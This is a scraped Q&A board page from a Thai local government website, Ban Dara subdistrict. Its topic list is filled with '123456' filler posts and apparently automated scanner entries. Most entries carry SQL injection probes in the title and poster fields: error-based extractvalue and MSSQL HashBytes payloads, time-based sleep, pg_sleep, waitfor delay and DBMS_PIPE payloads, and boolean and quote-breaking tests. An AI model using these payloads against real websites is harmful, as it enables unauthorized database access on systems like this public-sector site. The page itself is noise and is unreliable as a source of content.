:
ยินดีต้อนรับเข้าสู่องค์การบริหารส่วนตำบลบ้านดารา ติดต่อสอบถาม : โทรศัพท์ : 055-452241 อีเมล์ : bandaralocal@hotmail.com , bandarautt62@gmail.com

Q&A

หัวข้อ ผู้ตั้งกระทู้ ตอบ
Crawler gCorawlergo 2
Crawlerg Corawlergo 0
Crawlerg Corawlergo 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456'and/**/extractvalue(1,concat(char(126),md5(1561175554)))and' 0
123456 123456 0
123456 123456 0
123456 123456"and/**/extractvalue(1,concat(char(126),md5(1680032267)))and" 0
123456 123456 0
123456 extractvalue(1,concat(char(126),md5(1174206677))) 0
123456 123456 0
123456 123456 0
123456 123456'and(select'1'from/**/cast(md5(1092794776)as/**/int))>'0 0
123456 123456 0
123456 123456 0
123456 123456/**/and/**/cast(md5('1411785493')as/**/int)>0 0
123456 123456 0
123456 convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1160884441'))) 0
123456 123456 0
123456 123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1200443611')))>'0 0
123456 123456 0
123456 123456鎈'"\( 0
123456 123456 0
123456 123456'"\( 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456/**/and+2=2 0
123456 123456 0
123456 123456/**/and+3=7 0
123456 123456 0
123456 123456'and'g'='g 0
123456 123456 0
123456 123456'and'k'='w 0
123456 123456 0
123456 123456"and"z"="z 0
123456'and/**/extractvalue(1,concat(char(126),md5(1914186364)))and' 123456 0
123456 123456"and"c"="d 0
123456 123456 0
123456"and/**/extractvalue(1,concat(char(126),md5(1327704865)))and" 123456 0
123456 (select*from(select+sleep(0)union/**/select+1)a) 0
123456 123456 0
extractvalue(1,concat(char(126),md5(1302751600))) 123456 0
123456 (select*from(select+sleep(2)union/**/select+1)a) 0
123456'and(select'1'from/**/cast(md5(1821674679)as/**/int))>'0 123456 0
123456 123456 0
123456 123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 0
123456/**/and/**/cast(md5('1153508540')as/**/int)>0 123456 0
123456 123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 0
123456 123456 0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1969125065'))) 123456 0
123456 123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 0
123456 123456 0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1398282129')))>'0 123456 0
123456 123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 0
123456 123456 0
123456鎈'"\( 123456 0
123456 123456 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 0
123456'"\( 123456 0
123456 123456 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 0
123456 123456 0
123456 123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 0
123456 123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:0 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:2 0
123456 123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('f',0) 0
123456 123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('r',2) 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',2)='u 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456/**/and+4=4 123456 0
123456/**/and+0=9 123456 0
123456'and'r'='r 123456 0
123456'and's'='l 123456 0
123456"and"o"="o 123456 0
123456"and"g"="k 123456 0
(select*from(select+sleep(0)union/**/select+1)a) 123456 0
(select*from(select+sleep(2)union/**/select+1)a) 123456 0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 0
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 123456 0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 0
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 123456 0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 123456 0
123456'/**/and(select'1'from/**/pg_sleep(3))::text>'0 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:2 123456 0
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('g',0) 123456 0
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('h',2) 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',0)='n 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',2)='g 123456 0